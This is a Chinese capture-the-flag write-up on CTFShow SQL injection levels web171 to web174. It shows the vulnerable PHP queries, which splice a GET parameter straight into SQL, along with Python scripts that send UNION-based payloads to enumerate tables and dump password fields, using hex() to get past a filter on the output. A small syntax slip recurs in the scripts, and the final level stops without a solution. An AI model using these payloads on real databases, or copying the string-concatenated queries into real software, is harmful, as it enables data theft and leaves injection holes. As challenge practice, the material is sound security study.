CtfShow之SQL注入-持续更新

2023-05-18 11:32:39 浏览数 (1)

CtfShow之SQL注入

web171

代码语言:javascript复制
查询语句
//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
代码语言:javascript复制
#无过滤的字符型注入。
import requests
url = "http://66e1d748-4475-4aa9-8c95-fb3737690e46.challenge.ctf.show/api/?id="
# 查数据库
tablename = "-1' union select 1,2,group_concat(table_name) from information_schema.tables  where table_schema=database() -- "
# 查列名
columnname = "-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' -- "
# 查数据
payload = "-1' union select id,username,password from ctfshow_user -- "
res = requests.get(url payload)
print(res.text)

web172

代码语言:javascript复制
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if($row->username!=='flag'){
    $ret['msg']='查询成功';
}
代码语言:javascript复制
#无过滤的字符型注入,添加了条件限制 username!='flag'
import requests
url = "http://669d6879-73f9-4a49-97ac-56ca927f63b2.challenge.ctf.show/api/v2.php?id="
tablename = "0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- "
columnname = "0' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' -- "
payload = "0' union select 1,(select password from ctfshow_user2 where username='flag') -- "
res = requests.get(url payload)
print(res.text)

web173

代码语言:javascript复制
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
过滤了字符类型的注入,添加了检查结果中是否匹配正则表达式/flag/i
使用hex函数绕过正则过滤
代码语言:javascript复制
import requests
url = "http://8926a547-bbc7-4a5b-a20a-215fdc2c4037.challenge.ctf.show/api/v3.php?id="
tablename = "-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) -- "
columnname = "-1' union select 1,2,hex((select group_concat(column_name) from information_schema.columns where table_name = 'ctfshow_user3')) -- "
payload = "-1' union select 1,2,hex((select password from ctfshow_user3 where username='flag')) -- "
res = requests.get(url payload)
print(res.text)

web174

代码语言:javascript复制
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
sql schema select table union

0 人点赞